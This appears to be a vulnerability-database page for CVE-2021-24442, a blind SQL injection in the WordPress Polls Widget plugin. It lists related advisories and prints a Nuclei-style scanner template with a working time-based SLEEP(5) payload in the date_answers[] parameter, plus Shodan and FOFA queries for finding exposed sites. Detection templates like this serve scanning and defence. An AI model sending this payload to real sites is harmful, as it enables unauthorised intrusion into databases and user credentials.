| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2021-24442 | 6 Jun 202500:00 | – | circl | |
| WordPress 插件 SQL注入漏洞 | 12 Jul 202100:00 | – | cnnvd | |
| WordPress plugin code injection vulnerability (CNVD-2021-52424) | 14 Jul 202100:00 | – | cnvd | |
| CVE-2021-24442 | 12 Jul 202119:21 | – | cve | |
| CVE-2021-24442 Poll, Survey, Questionnaire and Voting system < 1.5.3 - Unauthenticated Blind SQL Injection | 12 Jul 202119:21 | – | cvelist | |
| CVE-2021-24442 | 12 Jul 202120:15 | – | nvd | |
| CVE-2021-24442 | 12 Jul 202120:15 | – | osv | |
| WordPress Polls Widget plugin <= 1.5.2 - Unauthenticated Blind SQL Injection (SQLi) vulnerability | 22 Jun 202100:00 | – | patchstack | |
| Sql injection | 12 Jul 202120:15 | – | prion | |
| CVE-2021-24442 | 22 May 202520:31 | – | redhatcve |
id: CVE-2021-24442
info:
name: Wordpress Polls Widget < 1.5.3 - SQL Injection
author: ritikchaddha
severity: critical
description: |
The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks
impact: |
Unauthenticated attackers can execute SQL injection to manipulate database contents, potentially gaining unauthorized access to all WordPress data including user credentials.
remediation: Fixed in 1.5.3
reference:
- https://wpscan.com/vulnerability/7376666e-9b2a-4239-b11f-8544435b444a/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24442
- https://wordpress.org/plugins/polls-widget/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24442
cwe-id: CWE-89
epss-score: 0.46921
epss-percentile: 0.98684
cpe: cpe:2.3:a:wpdevart:poll\,_survey\,_questionnaire_and_voting_system:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: wpdevart
product: poll\,_survey\,_questionnaire_and_voting_system
framework: wordpress
shodan-query: http.html:/wp-content/plugins/polls-widget/
fofa-query: body=/wp-content/plugins/polls-widget/
publicwww-query: "/wp-content/plugins/polls-widget/"
tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart,vkev,vuln
http:
- raw:
- |
@timeout: 25s
POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Forwarded-For: {{randstr}}
question_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5)
matchers:
- type: dsl
dsl:
- 'duration>=5'
- 'status_code == 200'
- 'contains_all(body, "{\"answer_name", "vote\":")'
condition: and
# digest: 4a0a00473045022100fe285ebfd3a53eed6d528b3f04ac65e1a994235064c05463aad176517df4b56402205ca05811ff021083725f1af594a670f44278ba1c87385744627471d3e477f552:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation